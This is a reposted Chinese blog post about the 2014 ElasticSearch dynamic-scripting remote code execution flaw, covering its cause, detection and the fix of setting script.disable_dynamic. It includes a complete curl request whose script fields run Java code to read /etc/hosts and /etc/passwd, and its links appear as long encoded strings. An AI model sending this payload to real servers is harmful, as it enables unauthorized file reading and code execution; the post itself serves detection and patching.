转载自
时间2014-05-23 02:11:32  CSDN博客    原文  941K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3u0D9L8$3N6Q4x3X3g2U0M7$3c8F1i4K6u0W2L8X3g2@1i4K6u0r3K9r3g2F1k6%4W2#2L8X3q4T1j5#2)9J5c8X3q4J5N6r3W2U0L8r3g2Q4x3V1k6V1k6i4c8S2K9h3I4K6i4K6u0r3x3U0j5$3y4o6x3^5x3e0y4Q4x3U0k6F1j5Y4y4H3i4K6y4n7  

.
原理

这个漏洞实际上非常简单，ElasticSearch有脚本执行( scripting )的功能，可以很方便地对查询出来的数据再加工处理。

ElasticSearch用的脚本引擎是 MVEL ，这个引擎没有做任何的防护，或者沙盒包装，所以直接可以执行任意代码。

而在ElasticSearch里，默认配置是打开动态脚本功能的，因此用户可以直接通过http请求，执行任意代码。

其实官方是清楚这个漏洞的，在文档里有说明：

First, you should not run Elasticsearch as the root user, as this would allow a script to access or do anything on your server, without limitations. Second, you should not expose Elasticsearch directly to users, but instead have a proxy application inbetween.  

检测方法

在线检测：

420K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4c8G2L8$3I4Q4x3X3g2K6j5$3q4F1N6W2)9J5k6h3y4G2L8g2)9J5c8X3g2K6i4K6u0W2K9s2c8E0L8q4)9J5y4X3&6T1M7%4m8Q4x3@1t1`.         可以检测任意地址

d21K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3u0G2N6h3E0Q4x3X3g2U0L8#2)9J5c8X3u0D9L8$3N6Q4x3V1k6W2L8r3q4K6N6r3W2U0M7$3g2S2M7X3y4Z5i4K6u0V1M7X3y4W2i4K6u0r3M7r3!0U0i4K6u0W2K9s2c8E0L8q4)9J5y4X3&6T1M7%4m8Q4x3@1t1`.  只检测localhost，不过会输出/etc/hosts和/etc/passwd文件的内容到网页上

自己手动检测：
curl -XPOST 'http://localhost:9200/_search?pretty' -d '
{
  "size": 1,
  "query": {
    "filtered": {
      "query": {
        "match_all": {}
      }
    }
  },
  "script_fields": {
    "/etc/hosts": {
      "script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/hosts\")).useDelimiter(\"\\\\Z\").next();"
    },
    "/etc/passwd": {
      "script": "import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"/etc/passwd\")).useDelimiter(\"\\\\Z\").next();"
    }
  }
}
'

处理办法

关掉执行脚本功能，在配置文件elasticsearch.yml里为每一个结点都加上：
script.disable_dynamic: true

3c9K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2D9j5i4y4@1K9h3y4K6k6h3q4J5j5$3S2Q4x3X3g2G2M7X3N6Q4x3V1k6Y4N6h3W2V1k6g2)9J5c8X3g2F1i4K6u0r3k6h3I4S2M7%4c8A6j5%4y4W2j5i4u0U0K9q4)9J5c8Y4u0W2k6X3g2J5k6h3&6U0k6g2)9J5c8X3y4#2M7Y4u0W2L8Y4c8Q4x3V1k6E0L8$3c8#2L8r3g2K6i4K6u0V1M7$3y4J5K9i4m8@1K9h3&6Y4i4K6u0W2K9s2c8E0L8q4)9J5x3#2)9#2k6X3c8A6M7$3q4T1L8r3W2F1k6#2)9#2k6X3c8&6L8X3q4E0K9h3y4Q4y4h3k6K6j5%4u0A6M7s2c8K6

官方会在1.2版本默认关闭动态脚本。

e68K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6Y4K9i4c8Z5N6h3u0Q4x3X3g2U0L8$3#2Q4x3V1k6W2L8r3q4K6N6r3W2U0M7$3g2S2M7X3y4Z5i4K6u0r3k6h3I4S2M7%4c8A6j5%4y4W2j5i4u0U0K9q4)9J5c8X3W2K6M7%4g2W2M7#2)9J5c8U0f1^5y4e0x3`.

参考：

3b3K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2D9j5i4y4@1K9h3y4K6k6h3q4J5j5$3S2Q4x3X3g2G2M7X3N6Q4x3V1k6Y4N6h3W2V1k6g2)9J5c8X3g2F1i4K6u0r3k6h3I4S2M7%4c8A6j5%4y4W2j5i4u0U0K9q4)9J5c8Y4u0W2k6X3g2J5k6h3&6U0k6g2)9J5c8X3y4#2M7Y4u0W2L8Y4c8Q4x3V1k6E0L8$3c8#2L8r3g2K6i4K6u0V1M7$3y4J5K9i4m8@1K9h3&6Y4i4K6u0W2K9s2c8E0L8l9`.`.

241K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3g2D9j5i4y4@1K9h3y4K6k6h3q4J5j5$3S2Q4x3X3g2G2M7X3N6Q4x3V1k6Y4N6h3W2V1k6g2)9J5c8X3g2F1i4K6u0r3k6h3I4S2M7%4c8A6j5%4y4W2j5i4u0U0K9q4)9J5c8Y4u0W2k6X3g2J5k6h3&6U0k6g2)9J5c8X3y4#2M7Y4u0W2L8Y4c8Q4x3V1k6K6k6h3q4J5j5$3S2Q4x3X3c8J5k6i4q4#2k6i4y4@1i4K6u0V1M7$3y4J5K9i4m8@1i4K6u0V1k6X3W2W2L8r3c8K6i4K6u0W2K9s2c8E0L8l9`.`.

adbK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3u0G2N6h3E0Q4x3X3g2U0L8#2)9J5c8X3u0D9L8$3N6Q4x3V1k6W2L8r3q4K6N6r3W2U0M7$3g2S2M7X3y4Z5i4K6u0V1M7X3y4W2i4K6u0r3

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课